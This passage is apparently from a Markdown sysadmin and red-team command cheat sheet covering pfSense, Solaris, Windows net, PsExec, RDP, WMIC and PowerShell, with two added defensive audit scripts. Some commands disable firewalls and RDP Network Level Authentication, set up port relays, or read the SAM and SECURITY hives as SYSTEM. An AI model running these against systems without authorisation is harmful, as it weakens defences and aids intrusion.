PHP pfSense shell allows configuration of the config.xml file directly without needing to use the webConfigurator.[[49]] 745 | 746 | ### Options 747 | 
![ii.png](https://www.dropbox.com/s/3mhvnw8v1eiql99/ii.png?dl=0&raw=1)

### pfSense Developer Shell

    print_r($config);                          # Output the configuration array
    print_r($config['interfaces']);            # Output the interfaces portion of config.xml
    print_r($config['dhcpd']);                 # Output the DHCP server configuration
    exit                                       # Exit the developer shell
    print_r(get_wireless_modes("ath0"));       # Output the supported wireless modes for an interface
    $config['system']['enablesshd'] = true;    # Enable SSH
    $config['interfaces']['optx']['wireless']['standard'] = "11a";   # Change optx to the OPT interface name such as BACKHAUL
    $config['interfaces']['optx']['wireless']['mode'] = "hostap";
    $config['interfaces']['optx']['wireless']['channel'] = "6";
    $config['dhcpd']['optx']['enable'] = true;                  # Enable the DHCP server for an optx interface
    $config['dhcpd']['optx']['range']['from'] = "192.168.31.100";
    $config['dhcpd']['optx']['range']['to'] = "192.168.31.150";
    $config['system']['disablefilter'] = true;                  # Disable the firewall filter
    $config['interfaces']['optx']['disabled'] = false;          # Enable an interface and configure it as a DHCP client
    $config['interfaces']['optx']['ipaddr'] = "dhcp";
    $config['interfaces']['wan']['enable'] = true;              # Enable an interface and set a static IPv4 address
    $config['interfaces']['wan']['ipaddr'] = "192.168.100.1";
    $config['interfaces']['wan']['subnet'] = "24";
    write_config();                                             # Save the new configuration (config.xml)
    system_reboot_sync();                                       # Reboot the system after saving

[49]:

Solaris
-------
[[45]]

    ifconfig -a                                # List of interfaces
    netstat -in                                # List of interfaces
    netstat -r                                 # Route listing
    ifconfig eth0 dhcp                         # Start DHCP client
    ifconfig eth0 plumb up ip netmask nmask    # Set IP
    route add default ip                       # Set gateway
    logins -p                                  # List users without passwords
    svcs -a                                    # List all services with status
    prstat -a                                  # Process listing (top)
    svcadm start ssh                           # Start SSH service
    inetadm -e telnet                          # Enable telnet (-d to disable)
    prtconf | grep Memory                      # Total physical memory
    iostat -En                                 # Hard disk size
    showrev -c /usr/bin/bash                   # Information on a binary
    shutdown -i6 -g0 -y                        # Restart system
    dfmounts                                   # List clients connected to NFS
    smc                                        # Solaris Management Console (GUI admin tool)
    snoop -d int -c pkt# -o results.pcap       # Packet capture
    /etc/vfstab                                # File system mount table
    /var/adm/logging                           # Login attempt log
    /etc/default/*                             # Default settings
    /etc/system                                # Kernel modules & config
    /var/adm/messages                          # Syslog location
    /etc/auto_*                                # Automounter config files
    /etc/inet/ipnodes                          # IPv4/IPv6 host file

[45]:

Windows Versions
----------------
[[55]]

    NT 3.1    # Windows NT 3.1 (All)
    NT 3.5    # Windows NT 3.5 (All)
    NT 3.51   # Windows NT 3.51 (All)
    NT 4.0    # Windows NT 4.0 (All)
    NT 5.0    # Windows 2000 (All)
    NT 5.1    # Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded)
    NT 5.2    # Windows XP (64-bit, Pro 64-bit), Windows Server 2003 & R2 (Standard, Enterprise), Windows Home Server
    NT 6.0    # Windows Vista (Starter, Home, Basic, Home Premium, Business, Enterprise, Ultimate), Windows Server 2008 (Foundation, Standard, Enterprise)
    NT 6.1    # Windows 7 (Starter, Home, Pro, Enterprise, Ultimate), Windows Server 2008 R2 (Foundation, Standard, Enterprise)
    NT 6.2    # Windows 8 (x86/64, Pro, Enterprise, Windows RT (ARM)), Windows Phone 8, Windows Server 2012 (Foundation, Essentials, Standard)
    NT 6.3    # Windows 8.1 (Pro, Enterprise), Windows Server 2012 R2 (Foundation, Essentials, Standard, Datacenter)
    NT 10.0   # Windows 10 (Home, Pro, Pro Education, Enterprise, Enterprise LTSB, Education, Mobile, Mobile Enterprise, IoT Core, IoT Enterprise, IoT Mobile Enterprise), Windows Server 2016 (Essentials,
Standard, Datacenter) 822 | 823 | [55]: 824 | 825 | Startup Directories 826 | ------------------- 827 | [[46]] 828 | 829 | ### NT 6.1 830 | 831 | Personal Startup folder: 832 | 833 | %SystemDrive%\Users\\AppData\Roaming\Microsoft\Windows\Start\ Menu\Programs\Startup 834 | 835 | All Users: 836 | 837 | %SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup 838 | 839 | Shortcut: Run -> shell:common startup 840 | 841 | [46]: https://watchthestack.files.wordpress.com/2015/03/rtfm-red-team-field-manual.pdf 842 | 843 | Useful Run Commands 844 | ------------------- 845 | [[48]] 846 | 847 | access.cpl # Accessibility Controls 848 | accwiz # Accessibility Wizard 849 | hdwwiz.cpl # Add Hardware Wizard 850 | appwiz.cpl # Add/Remove Programs 851 | control admintools # Administrative Tools 852 | acrobat # Adobe Acrobat (if installed) 853 | formdesigner # Adobe Designer (if installed) 854 | acrodist # Adobe Distiller (if installed) 855 | imageready # Adobe ImageReady (if installed) 856 | photoshop # Adobe Photoshop (if installed) 857 | wuaucpl.cpl # Automatic Updates 858 | fsquirt # Bluetooth Transfer Wizard 859 | calc # Calculator 860 | certmgr.msc # Certificate Manager 861 | charmap # Character Map 862 | chkdsk # Check Disk Utility 863 | clipbrd # Clipboard Viewer 864 | cmd # Command Prompt 865 | dcomcnfg # Component Services 866 | compmgmt.msc # Computer Management 867 | control # Control Panel 868 | timedate.cpl # Date and Time Properties 869 | ddeshare # DDE Shares 870 | devmgmt.msc # Device Manager 871 | directx.cpl # Direct X Control Panel (if installed)* 872 | dxdiag # Direct X Troubleshooter 873 | cleanmgr # Disk Cleanup Utility 874 | dfrg.msc # Disk Defragment 875 | diskmgmt.msc # Disk Management 876 | diskpart # Disk Partition Manager 877 | control desktop # Display Properties 878 | desk.cpl # Display Properties 879 | control color # Display Properties (w/Appearance Tab Preselected) 880 | drwtsn32 # Dr. 
Watson System Troubleshooting Utility 881 | verifier # Driver Verifier Utility 882 | eventvwr.msc # Event Viewer 883 | migwiz # Files and Settings Transfer Tool 884 | sigverif # File Signature Verification Tool 885 | findfast.cpl # Findfast 886 | firefox # Firefox (if installed) 887 | folders # Folders Properties 888 | control fonts # Fonts 889 | fonts # Fonts Folder 890 | freecell # Free Cell Card Game 891 | joy.cpl # Game Controllers 892 | gpedit.msc # Group Policy Editor (XP Prof) 893 | mshearts # Hearts Card Game 894 | helpctr # Help and Support 895 | hypertrm # HyperTerminal 896 | iexpress # Iexpress Wizard 897 | ciadv.msc # Indexing Service 898 | icwconn1 # Internet Connection Wizard 899 | iexplore # Internet Explorer 900 | inetcpl.cpl # Internet Properties 901 | inetwiz # Internet Setup Wizard 902 | ipconfig /all # IP Configuration (Display Connection Configuration) 903 | ipconfig /displaydns # IP Configuration (Display DNS Cache Contents) 904 | ipconfig /flushdns # IP Configuration (Delete DNS Cache Contents) 905 | ipconfig /release # IP Configuration (Release All Connections) 906 | ipconfig /renew # IP Configuration (Renew All Connections) 907 | ipconfig /registerdns # IP Configuration (Refreshes DHCP & Re-Registers DNS) 908 | ipconfig /showclassid # IP Configuration (Display DHCP Class ID) 909 | ipconfig /setclassid # IP Configuration (Modifies DHCP Class ID) 910 | jpicpl32.cpl # Java Control Panel (if installed) 911 | javaws # Java Control Panel (if installed) 912 | control keyboard # Keyboard Properties 913 | secpol.msc # Local Security Settings 914 | lusrmgr.msc # Local Users and Groups 915 | logoff # Logs You Out Of Windows 916 | mrt # Malicious Software Removal Tool 917 | msaccess # Microsoft Access (if installed) 918 | winchat # Microsoft Chat 919 | excel # Microsoft Excel (if installed) 920 | frontpg # Microsoft Frontpage (if installed) 921 | moviemk # Microsoft Movie Maker 922 | mspaint # Microsoft Paint 923 | powerpnt # Microsoft Powerpoint (if 
installed) 924 | winword # Microsoft Word (if installed) 925 | mobsync # Microsoft Syncronization Tool 926 | winmine # Minesweeper Game 927 | control mouse # Mouse Properties 928 | main.cpl # Mouse Properties 929 | nero # Nero (if installed) 930 | conf # Netmeeting 931 | control netconnections # Network Connections 932 | ncpa.cpl # Network Connections 933 | netsetup.cpl # Network Setup Wizard 934 | notepad # Notepad 935 | nvtuicpl.cpl # Nview Desktop Manager (if installed) 936 | packager # Object Packager 937 | odbccp32.cpl # ODBC Data Source Administrator 938 | osk # On Screen Keyboard 939 | ac3filter.cpl # Opens AC3 Filter (if installed) 940 | msimn # Outlook Express 941 | pbrush # Paint 942 | password.cpl # Password Properties 943 | perfmon.msc # Performance Monitor 944 | perfmon # Performance Monitor 945 | telephon.cpl # Phone and Modem Options 946 | dialer # Phone Dialer 947 | pinball # Pinball Game 948 | powercfg.cpl # Power Configuration 949 | control printers # Printers and Faxes 950 | printers # Printers Folder 951 | eudcedit # Private Character Editor 952 | QuickTime.cpl # Quicktime (If Installed) 953 | quicktimeplayer # Quicktime Player (if installed) 954 | realplay # Real Player (if installed) 955 | intl.cpl # Regional Settings 956 | regedit # Registry Editor 957 | regedit32 # Registry Editor 958 | rasphone # Remote Access Phonebook 959 | mstsc # Remote Desktop 960 | ntmsmgr.msc # Removable Storage 961 | ntmsoprq.msc # Removable Storage Operator Requests 962 | rsop.msc # Resultant Set of Policy (XP Prof) 963 | sticpl.cpl # Scanners and Cameras 964 | control schedtasks # Scheduled Tasks 965 | wscui.cpl # Security Center 966 | services.msc # Services 967 | fsmgmt.msc # Shared Folders 968 | shutdown # Shuts Down Windows 969 | mmsys.cpl # Sounds and Audio 970 | spider # Spider Solitare Card Game 971 | cliconfg # SQL Client Configuration 972 | sysedit # System Configuration Editor 973 | msconfig # System Configuration Utility 974 | sfc /scannow # System File 
Checker Utility (Scan Immediately) 975 | sfc /scanonce # System File Checker Utility (Scan Once At The Next Boot) 976 | sfc /scanboot # System File Checker Utility (Scan On Every Boot) 977 | sfc /revert # System File Checker Utility (Return Scan Setting To Default) 978 | sfc /purgecache # System File Checker Utility (Purge File Cache) 979 | sfc /cachesize=x # System File Checker Utility (Sets Cache Size to size x) 980 | msinfo32 # System Information 981 | sysdm.cpl # System Properties 982 | taskmgr # Task Manager 983 | tcptest # TCP Tester 984 | telnet # Telnet Client 985 | tweakui # Tweak UI (if installed) 986 | nusrmgr.cpl # User Account Management 987 | utilman # Utility Manager 988 | wab # Windows Address Book 989 | wabmig # Windows Address Book Import Utility 990 | ntbackup # Windows Backup Utility (if installed) 991 | explorer # Windows Explorer 992 | firewall.cpl # Windows Firewall 993 | magnify # Windows Magnifier 994 | wmimgmt.msc # Windows Management Infrastructure 995 | wmplayer # Windows Media Player 996 | msmsgs # Windows Messenger 997 | wiaacmgr # Windows Picture Import Wizard (need camera connected) 998 | syskey # Windows System Security Tool 999 | wupdmgr # Windows Update Launches 1000 | winver # Windows Version (to show which version of windows) 1001 | tourstart # Windows XP Tour Wizard 1002 | write # Wordpad 1003 | [48]: 1004 | 1005 | Systeminfo 1006 | ---------- 1007 | 1008 | ### Syntax[[54]] 1009 | 1010 | systeminfo [/s [/u \ [/p ]]] [/fo {TABLE | LIST | CSV}] [/nh] 1011 | 1012 | /s # Specifies the name or IP address of a remote computer 1013 | /u # Runs the command with the account permissions of the specified user account 1014 | /p # Specifies the password of the user account that is specified in the /u parameter 1015 | /fo # Specifies the output format 1016 | /nh # Suppresses column headers in the output. 1017 | /? # Displays help at the command prompt. 

Tasklist
--------

### Syntax

    tasklist[.exe] [/s computer] [/u domain\user [/p password]] [/fo {TABLE|LIST|CSV}] [/nh] [/fi FilterName [/fi FilterName2 [ ... ]]] [/m [ModuleName] | /svc | /v]

Reg query
---------

### Syntax

    reg query KeyName [{/v ValueName | /ve}] [/s] [/se Separator] [/f Data] [{/k | /d}] [/c] [/e] [/t Type] [/z]

    /ve # Queries for value names that are empty
    /s # Queries all subkeys and value names recursively
    /se # Specifies the single value separator to search for in value names of type REG_MULTI_SZ
    /f # Specifies the data or pattern to search for
    /k # Searches in key names only
    /d # Searches in data only
    /c # Makes the query case sensitive
    /e # Returns only exact matches
    /t # Specifies the registry types to search
    /z # Includes the numeric equivalent of the registry type in the results

[54]:

Windows Net/Domain Commands
---------------------------

### Net user - Syntax [[52]]

    net user [UserName [Password | *] [Options]] [/domain]
    net user [UserName {Password | *} /add [Options] [/domain]]
    net user [UserName [/delete] [/domain]]

### Net view - Syntax

    net view [\\ComputerName [/CACHE] | [/ALL] | /DOMAIN[:DomainName]]

### Net view - Examples

    net view \\production # List the resources shared by the \\production computer
    net view /domain:sales # List the computers in the sales domain or workgroup

### Net group - Syntax

    net group [GroupName [/comment:"Text"]] [/domain]
    net group GroupName {/add [/comment:"Text"] | /delete} [/domain]
    net group GroupName UserName [...] {/add | /delete} [/domain]

### Net group - Examples

    net group # List all the groups on the local server
    net group exec /add # Add a group called Exec to the local user accounts database
    net group exec /add /domain # Add a group called Exec to the domain database
    net group exec estherv ralfr stevent /add # Add the existing user accounts estherv, ralfr, and stevent to the Exec group on the local computer
    net group exec estherv ralfr stevent /add /domain # Add the existing user accounts estherv, ralfr, and stevent to the Exec group in the domain database
    net group exec # Display the users in the Exec group
    net group exec /comment:"The executive staff" # Add a comment to the Exec group record

[52]:

Running remote commands
-----------------------

Many Windows PowerShell cmdlets have a ComputerName parameter that lets you collect data and change settings on one or more remote computers. They use a variety of communication technologies, and many work on all Windows operating systems that Windows PowerShell supports without any special configuration.[[42]]

Typically, cmdlets that support remoting without special configuration have the ComputerName parameter and do not have the Session parameter. To find these cmdlets in your session, type:

    Get-Command | where { $_.parameters.keys -contains "ComputerName" -and $_.parameters.keys -notcontains "Session" }

### Start an Interactive Session

To start an interactive session with a single remote computer, use the Enter-PSSession cmdlet.

    Enter-PSSession Server01

### Exit Session

    Exit-PSSession

### Running a remote command

To run any command on one or many remote computers, use the Invoke-Command cmdlet. For example, to run a Get-UICulture command on the Server01 and Server02 remote computers, type:

    Invoke-Command -ComputerName Server01, Server02 {Get-UICulture}

### Output example

![Untitled.png](https://www.dropbox.com/s/k545zhqu94vn33c/Untitled.png?dl=0&raw=1)

### Run a script

    Invoke-Command -ComputerName Server01, Server02 -FilePath c:\Scripts\DiskCollect.ps1

### Establish a Persistent Connection

The following command creates a remote session on the Server01 computer and another remote session on the Server02 computer. It saves the session objects in the $s variable.

    $s = New-PSSession -ComputerName Server01, Server02

The next command uses the sessions in $s to run Get-HotFix on both computers and saves the results in the $h variable on each remote computer.

    Invoke-Command -Session $s {$h = Get-HotFix}

Now you can use the data in the $h variable in subsequent commands, such as the following one. The results are displayed on the local computer.

    Invoke-Command -Session $s {$h | where {$_.installedby -ne "NTAUTHORITY\SYSTEM"}}

[42]:

Windows network commands
------------------------
[[53]]

    $ Arp # Display or manipulate the ARP information on a network device or computer
    $ Finger # The finger command, available in Unix and Linux variants, lets a user look up information (sometimes personal) about a user
    $ Hostname # Displays the host name of the Windows XP computer currently logged into
    $ Ipconfig # Displays the network settings currently assigned, including those given by a network
    $ Pathping # An MS-DOS utility available to Windows 2000 and Windows XP users; it lets a user find network latency and network loss
    $ Ping # Pinging another address helps determine whether the network card can communicate within the local network or with an outside network
    $ Nbtstat # Displays protocol statistics and current TCP/IP connections using NBT
    $ Net # Available in MS-DOS and Windows; used to set, view, and determine network settings
    $ Netstat # Displays TCP/IP network protocol statistics and information
    $ Nslookup # Lets a user do a reverse lookup on an IP address of a domain or host on a network
    $ Route # Lets a user view and modify the computer's routing table
    $ Tracert and traceroute # Show how a network packet travels through the network and where it may fail or slow down
    $ Whois # Available in Unix and Linux variants; identifies the owner of a domain name, much like the WHOIS service at Network Solutions
    $ Winipcfg # Available in Windows; displays network and network adapter information such as IP address, subnet mask, gateway, etc.
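The "Running remote commands" section and the network commands above can be combined into one collection script. The following is an added example written for this page, not code from the original cheat sheet or from Microsoft's documentation. The host names Server01 and Server02 are the page's placeholders; the script assumes WinRM is already enabled on the targets and that the caller holds administrative rights there. It uses the NetTCPIP cmdlets (Get-NetIPAddress, Get-NetTCPConnection, Get-NetNeighbor) as the object-returning counterparts of ipconfig, netstat and arp, and, unlike the page's snippets, removes the sessions it created.

```powershell
# Added example (not from the original page or its sources): collect basic network
# state from several hosts over PowerShell remoting using persistent sessions,
# write one JSON file per host, flag management ports bound to all interfaces,
# and always close the sessions.
# Assumptions: WinRM enabled on the targets, admin rights there, and the host
# names below are the page's placeholders.
param(
    [string[]]$ComputerName = @('Server01', 'Server02'),
    [string]$OutDir = "$env:TEMP\net-inventory"
)

New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

# One persistent session per host; an unreachable host is reported, not fatal.
$sessions = New-PSSession -ComputerName $ComputerName -ErrorAction Continue
if (-not $sessions) { throw 'No remote session could be established.' }

try {
    # This script block runs on each remote host and returns one object per host.
    $results = Invoke-Command -Session $sessions -ScriptBlock {
        [pscustomobject]@{
            # ipconfig equivalent: configured IPv4 addresses, minus loopback/APIPA
            Addresses   = Get-NetIPAddress -AddressFamily IPv4 |
                          Where-Object { $_.IPAddress -ne '127.0.0.1' -and $_.IPAddress -notlike '169.254.*' } |
                          Select-Object InterfaceAlias, IPAddress, PrefixLength
            # netstat -ano equivalent, listening sockets only
            Listeners   = Get-NetTCPConnection -State Listen |
                          Select-Object LocalAddress, LocalPort, OwningProcess
            # arp -a equivalent
            Neighbors   = Get-NetNeighbor -AddressFamily IPv4 -State Reachable, Stale |
                          Select-Object IPAddress, LinkLayerAddress, InterfaceAlias
            CollectedAt = Get-Date
        }
    }

    foreach ($r in $results) {
        # Invoke-Command adds PSComputerName to every object it returns.
        $file = Join-Path $OutDir "$($r.PSComputerName).json"
        $r | ConvertTo-Json -Depth 4 | Set-Content -Path $file -Encoding UTF8

        # RDP (3389) and WinRM (5985/5986) listening on 0.0.0.0 are exposed
        # remote-management surface worth a second look.
        $exposed = $r.Listeners | Where-Object {
            $_.LocalAddress -eq '0.0.0.0' -and $_.LocalPort -in 3389, 5985, 5986
        }
        foreach ($l in $exposed) {
            Write-Warning ('{0}: management port {1} listening on all interfaces (PID {2})' -f
                $r.PSComputerName, $l.LocalPort, $l.OwningProcess)
        }
    }
    Write-Output "Inventory written to $OutDir"
}
finally {
    # New-PSSession objects persist until removed; close them even on error.
    Remove-PSSession -Session $sessions
}
```

Save it as a .ps1 and run it with `-ComputerName host1, host2` to override the placeholders; the per-host JSON files give a baseline that later runs can be diffed against.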

[53]:

Hidden tools in Command Line
----------------------------

NOTICE: You need to run CMD with administrator privileges [[10]]

### System file checker

    $ sfc /scannow # Performs an immediate scan of your system and replaces files as necessary. You may need to restart Windows afterwards if it finds problems
    $ sfc /scanonce # Performs a scan the next time you restart your system
    $ sfc /scanboot # Schedules a scan to be performed every time you restart your system
    $ sfc /revert # Returns the System File Checker to its default settings. You can use it to turn off the /scanboot option, for example

### Check disk

    $ chkdsk Volume # To check a whole drive, just give the drive letter
    $ chkdsk Filename # chkdsk can also check a single file or group of files
    $ chkdsk /F # Has chkdsk go ahead and fix the errors it finds
    $ chkdsk /R # Forces chkdsk to locate bad sectors and recover information from them. If chkdsk cannot lock the disk (which it usually can't while Windows is running from it), it offers to run the command the next time you restart Windows

### Cipher

    $ cipher /W:pathname # The /W option overwrites data on unused portions of a volume, effectively erasing data that may linger on the drive after deletion. You can point cipher at an entire volume (like C:) or a specific folder

NOTICE: This applies to traditional hard drives, not SSDs.

### Driverquery

    $ driverquery /s # Specifies the name or IP address of a remote computer so that you can investigate the drivers it has installed
    $ driverquery /si # Shows the digital signature information for drivers
    $ driverquery /fo # The key option: specifies the format in which information is displayed so that you can save it as a report

Example:

    driverquery /fo CSV > drivers.csv

![g91lech9vvrplpbh0qnd.png](https://www.dropbox.com/s/mfgbhgugjic88vq/g91lech9vvrplpbh0qnd.png?dl=0&raw=1)

[10]:

Miscellaneous commands Windows
------------------------------

### Lock Workstation [[37]]

    rundll32.dll user32.dll LockWorkstation

### Disable Windows Firewall

    netsh advfirewall set currentprofile state off
    netsh advfirewall set allprofiles state off

### Native Windows Port Forward

    netsh interface portproxy add v4tov4 listenport=3000 listenaddress=1.1.1.1 connectport=4000 connectaddress=2.2.2.2

    # Remove
    netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=1.1.1.1

NOTICE: Must use administrative privileges.
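The commands in this section (firewall off, portproxy) and in the Terminal Services section below all widen remote access, and a defender needs to be able to read those settings back. The following audit script is an added example for this page (not from RTFM or the other cited sources). It assumes an elevated PowerShell 5.1 or later prompt on Windows 8 / Server 2012 or newer (for Get-NetFirewallProfile), and reads the portproxy table from the registry key `HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp`, where netsh stores v4tov4 rules, instead of parsing the localized output of `netsh interface portproxy show all`.

```powershell
# Added example (not from the original page or the tools it cites): report the
# remote-access settings that the netsh/reg commands on this page change.
# Run from an elevated PowerShell prompt (the page's NOTICE about administrative
# privileges applies here too).

function Get-PortProxyRule {
    # netsh keeps v4tov4 TCP rules under this key. Each value name is
    # "listenaddress/listenport" ("*" when no listenaddress was given) and the
    # data is "connectaddress/connectport".
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp'
    if (-not (Test-Path $key)) { return @() }
    $item = Get-Item $key
    foreach ($name in $item.GetValueNames()) {
        $listen  = $name -split '/'
        $connect = ([string]$item.GetValue($name)) -split '/'
        [pscustomobject]@{
            ListenAddress  = $listen[0]
            ListenPort     = [int]$listen[1]
            ConnectAddress = $connect[0]
            ConnectPort    = [int]$connect[1]
        }
    }
}

function Get-RemoteAccessPosture {
    $ts  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $rdp = Join-Path $ts 'WinStations\RDP-Tcp'

    $deny = (Get-ItemProperty $ts  -Name fDenyTSConnections -ErrorAction SilentlyContinue).fDenyTSConnections
    $nla  = (Get-ItemProperty $rdp -Name UserAuthentication -ErrorAction SilentlyContinue).UserAuthentication

    [pscustomobject]@{
        # fDenyTSConnections: 0 = RDP connections allowed, 1 = denied
        RdpEnabled     = ($deny -eq 0)
        # UserAuthentication: 1 = Network Level Authentication required, 0 = disabled
        NlaRequired    = ($nla -eq 1)
        # Profiles that 'netsh advfirewall set ... state off' has switched off
        FirewallOff    = @(Get-NetFirewallProfile |
                           Where-Object { $_.Enabled -eq 'False' } |
                           Select-Object -ExpandProperty Name)
        PortProxyRules = @(Get-PortProxyRule)
    }
}

$posture = Get-RemoteAccessPosture
$posture | Format-List

if ($posture.RdpEnabled -and -not $posture.NlaRequired) {
    Write-Warning 'RDP is enabled without Network Level Authentication.'
}
if ($posture.FirewallOff.Count -gt 0) {
    Write-Warning ('Windows Firewall is disabled for profile(s): {0}' -f ($posture.FirewallOff -join ', '))
}
foreach ($rule in $posture.PortProxyRules) {
    # Each rule is printed with the matching delete command from this section.
    Write-Warning ('portproxy rule forwards {0}:{1} -> {2}:{3}; remove with: netsh interface portproxy delete v4tov4 listenport={1} listenaddress={0}' -f
        $rule.ListenAddress, $rule.ListenPort, $rule.ConnectAddress, $rule.ConnectPort)
}
```

A machine with no portproxy rules, NLA required and all three firewall profiles enabled produces no warnings; anything else is a finding to investigate, since none of these settings change on their own.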

### Re-Enable Command prompt

    reg add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f

[37]:

PsExec
------

PsExec is a light-weight telnet replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software.[[41]]

    # Launch an interactive command prompt on \\marklap
    psexec \\marklap cmd

    # Execute ipconfig on the remote system with the /all switch and display the resulting output locally
    psexec \\marklap ipconfig /all

    # Copy the program test.exe to the remote system and execute it interactively
    psexec \\marklap -c test.exe

    # Specify the full path to a program that is already installed on the remote system if it is not on the system's path
    psexec \\marklap c:\bin\test.exe

    # Run Regedit interactively in the System account to view the contents of the SAM and SECURITY keys
    psexec -i -d -s c:\windows\regedit.exe

    # Run Internet Explorer with limited-user privileges
    psexec -l -d "c:\program files\internet explorer\iexplore.exe"

[41]:

Terminal Services
-----------------

Terminal Services provides the ability to host multiple, simultaneous client sessions on Microsoft Windows Server 2003.[[47]]

### Terminal Services Architecture

![aa.gif](https://www.dropbox.com/s/mon59ohqha3p7g8/aa.gif?dl=0&raw=1)

### Start RDP

1. Create a regfile.reg file with the following lines in it:

        Windows Registry Editor Version 5.00

        [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
        "fDenyTSConnections"=dword:00000000

2. Import it: `reg import regfile.reg`
3. `net start "termservice"`
4. `sc config termservice start= auto`
5. `net start termservice`

### Disable Network Level Authentication, Add Firewall Exception

    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
    netsh firewall set service type = remotedesktop mode = enable

[47]:

WMIC
----

WMIC extends WMI for operation from several command-line interfaces and through batch scripts. Before WMIC, you used WMI-based applications (such as SMS), the WMI Scripting API, or tools such as CIM Studio to manage WMI-enabled computers. Without a firm grasp of a programming language such as C++ or a scripting language such as VBScript, and a basic understanding of the WMI namespace, do-it-yourself systems management with WMI was difficult. WMIC changes this situation by giving you a powerful, user-friendly interface to the WMI namespace.[[51]]

### Listing 1: Code to Display Results at the Console from a WMIC Batch File

    wmic /node:SERVER1,SERVER4 cpu get name,caption,maxclockspeed,systemname /format:textvaluelist.xsl

### Listing 2: Code to Use Variables in a WMIC Batch File

    @echo off
    if "%1"=="" goto msg
    if "%2"=="" goto single
    wmic /node:%1,%2 cpu get name,caption,maxclockspeed,systemname /format:textvaluelist.xsl
    goto end
    :single
    wmic /node:%1 cpu get name,caption,maxclockspeed,systemname /format:textvaluelist.xsl
    goto end
    :msg
    echo You must specify at least one computer name.
    :end

### Listing 3: Code to Direct WMIC Output to an HTML File

    wmic /node:SERVER4 /output:e:\file1.htm cpu get description,maxclockspeed,extclock,manufacturer,revision /format:hform.xsl

### Listing 4: Code to Direct Class Command Output to an HTML File

    wmic /output:e:\se_class.htm class WIN32_SOFTWAREELEMENT get

### Listing 5: Code to Generate XML Output from a WMIC Command

    wmic cpu get maxclockspeed /translate:basicxml /format:rawxml.xsl

[51]:

Powershell
----------
[[40]]

    # # Comment / Remark
    $_ # The current pipeline object
    $variable = "value" # Define a variable; also: ${n!a#me} = "value"
    % # Alias for ForEach-Object
    --% # Stop parsing input
    & (call) # Run a command, script or function
    . (source) # Run a command script in the current shell
    ? # Alias for Where-Object
    @(...) # Force an expression to be evaluated as an array
    -f # Format operator
    Active Directory # Account, Computer, Group and User cmdlets
    Add-Computer # Add a computer to the domain
    Add-Content # Add to the content of the item
    Add-History # Add entries to the session history
    Add-Member # Add a member to an instance of a PowerShell object
    Add-PsSnapIn # Add snap-ins to the console
    Add-Type # Add a .NET Framework type to a PowerShell session
    Add-WindowsFeature # Install roles, role services, and features
    Backup-GPO # Back up group policy objects (GPOs)
    Begin # Function BEGIN block
    BITS # Background Intelligent Transfer Service cmdlets
    Break # Exit a program loop
    Catch # Handle a terminating error within a scriptblock
    Checkpoint-Computer # Create a system restore point (XP)
    Checkpoint-Web # Create a checkpoint for an IIS web app
    Clear-Content # Remove content from a file/item
    Clear-EventLog # Delete all entries from an event log
    Clear-History # Delete entries from the session history
    Clear-Host # Clear the screen
    Clear-Item # Remove content from a variable or an alias
    Clear-ItemProperty # Remove the property value from a property
    Clear-Variable # Remove the value from a variable
    Compare-Object # Compare the properties of objects
    Complete-Transaction # Commit the transaction
    Compress-Archive # Create a new archive/zipped file [PS 5+]
    Connect-WSMan # Connect to the WinRM service on a remote computer
    Continue # Skip just this iteration of a loop
    ConvertFrom-CSV # Convert object properties (in CSV format) into CSV objects
    ConvertFrom-SecureString # Convert a secure string into an encrypted standard string
    ConvertFrom-StringData # Convert a here-string into a hash table
    Convert-Path # Convert a PS path to a provider path
    ConvertTo-CSV # Convert .NET Framework objects into CSV variable
    ConvertTo-Html # Convert the input into an HTML table
    ConvertTo-SecureString # Convert an encrypted standard string into a secure string
    ConvertTo-Xml # Convert the input into XML
    Copy-Item # Copy an item from a namespace location
    Copy-ItemProperty # Copy a property along with its value
    Debug-Process # Attach a debugger to a running process
    Disable-ComputerRestore # Disable System Restore on a drive
    Disable-PSBreakpoint # Disable a breakpoint in the current console
    Disable-PSRemoting # Disable remote session configuration on the local computer
    Disable-PSSessionConfiguration # Disable session configurations on the local computer
    Disable-WSManCredSSP # Disable Credential Security Service Provider (SSP) authentication
    Disconnect-WSMan # Disconnect from the WinRM service on a remote computer
    Do # Loop while a condition is True
    Enable-ComputerRestore # Enable System Restore on a drive
    Enable-PSBreakpoint # Enable a breakpoint in the current console
    Enable-PSRemoting # Run PowerShell commands on remote computers
    Enable-PSSessionConfiguration # Enable session configurations on the local computer
    Enable-WSManCredSSP # Enable Credential SSP authentication
    End # Function END block
    Enter-PSSession # Start an interactive session with a remote computer
    Exit # Exit PowerShell (or exit a script)
    Exit-PSSession # End an interactive session with a remote computer
    Expand-Archive # Extract files from an archive (zipped) file [PS 5+]
    Export-Alias # Export an alias list to a file
    Export-Clixml # Produce a clixml representation of PowerShell ob
    Export-Console # Export console configuration to a file
    Export-Counter # Export Performance Counter data to log files
    Export-Csv # Export to Comma Separated Values (spreadsheet)
    Export-FormatData # Save formatting data from the current session
    Export-ModuleMember # Export specific module members
    Export-PSSession # Import commands and save them in a PowerShell mo
    For # Loop through items that match a condition
    ForEach # Loop through each item in a collection
    ForEach method # Loop through each item in a collection
    ForEach-Object # Loop through each item in the pipeline ( % )
    Format-Custom # Format output using a customized view
    Format-List # Format output as a list of properties, each on a
    Format-Table # Format output as a table
    Format-Wide # Format output as a table listing one property on
    Get-Acl # Get permission settings for a file or registry ke
    Get-Alias # Return alias names for Cmdlets
    Get-AuthenticodeSignature # Get the signature object associated with a file
    Get-ChildItem # Get child items (contents of a folder or registry)
    Get-Command # Retrieve basic information about a command or cmdlet
    Get-ComputerRestorePoint # Get the restore points on the local computer
    Get-Content # Get content from item (specific location)
    Get-Counter # Get performance counter data
    Get-Credential # Get a security credential (username/password)
